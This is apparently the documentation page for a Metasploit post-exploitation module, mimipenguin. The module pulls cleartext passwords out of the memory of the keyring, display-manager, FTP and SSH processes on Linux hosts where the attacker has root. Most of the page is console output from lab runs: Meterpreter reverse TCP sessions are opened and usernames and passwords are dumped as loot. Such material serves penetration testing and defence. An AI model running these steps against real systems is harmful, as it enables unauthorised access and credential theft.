This finds cleartext passwords in process memory by first locating needles that are known to be found nearby.
This currently searches for passwords in gnome-keyring-daemon, gdm-password,
vsftpd, ssh, and lightdm.
- Get a meterpreter session on a Linux-based target (with root privileges)
- Do:
use post/linux/gather/mimipenguin - Do:
set session <sess_no> - Do:
run - You should get credentials for the vulnerable services installed
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Sending stage (3020772 bytes) to 192.168.140.140
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.140:35100 ) at 2022-06-22 13:11:24 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.140.140
OS : Ubuntu 22.04 (Linux 5.15.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/linux/gather/mimipenguin
msf6 post(linux/gather/mimipenguin) > set session 1
session => 1
msf6 post(linux/gather/mimipenguin) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 1 valid credential(s)!
Credentials
===========
Process Name Username Password
------------ -------- --------
gnome-keyring-daemon mimipenguin M!mipenguinPass
[*] Credentials stored in /home/space/.msf4/loot/20220622131237_default_192.168.140.140_mimipenguin.csv_806145.txt
[*] Post module execution completed
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Sending stage (3020772 bytes) to 192.168.140.131
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.131:57524 ) at 2022-06-22 13:17:35 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.140.131
OS : Ubuntu 21.04 (Linux 5.11.0-49-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > previous
msf6 post(linux/gather/mimipenguin) > set session 2
session => 2
msf6 post(linux/gather/mimipenguin) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 2 valid credential(s)!
Credentials
===========
Process Name Username Password
------------ -------- --------
gnome-keyring-daemon space password
vsftpd jdoe AccountF0rFTP
[*] Credentials stored in /home/space/.msf4/loot/20220622131938_default_192.168.140.131_mimipenguin.csv_269764.txt
[*] Post module execution completed
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Sending stage (3020772 bytes) to 192.168.140.165
[*] Meterpreter session 3 opened (192.168.140.1:4444 -> 192.168.140.165:39180 ) at 2022-06-22 13:23:26 -0500
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(multi/handler) > previous
msf6 post(linux/gather/mimipenguin) > set session 3
session => 3
msf6 post(linux/gather/mimipenguin) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 2 valid credential(s)!
Credentials
===========
Process Name Username Password
------------ -------- --------
gnome-keyring-daemon mimipenguin M!mipenguinPass
vsftpd ftp_user FTPP@ssword
[*] Credentials stored in /home/space/.msf4/loot/20220622132521_default_192.168.140.165_mimipenguin.csv_330546.txt
[*] Post module execution completed
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Sending stage (989032 bytes) to 192.168.140.135
[*] Meterpreter session 4 opened (192.168.140.1:4444 -> 192.168.140.135:37070 ) at 2022-06-22 13:34:19 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.140.135
OS : Ubuntu 14.04 (Linux 4.4.0-142-generic)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/handler) > previous
msf6 post(linux/gather/mimipenguin) > set session 4
session => 4
msf6 post(linux/gather/mimipenguin) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 2 valid credential(s)!
Credentials
===========
Process Name Username Password
------------ -------- --------
gnome-keyring-daemon space password
gnome-keyring-daemon test RunningUpThatH!ll
[*] Credentials stored in /Users/space/.msf4/loot/20220622133502_default_192.168.140.135_mimipenguin.csv_117775.txt
[*] Post module execution completed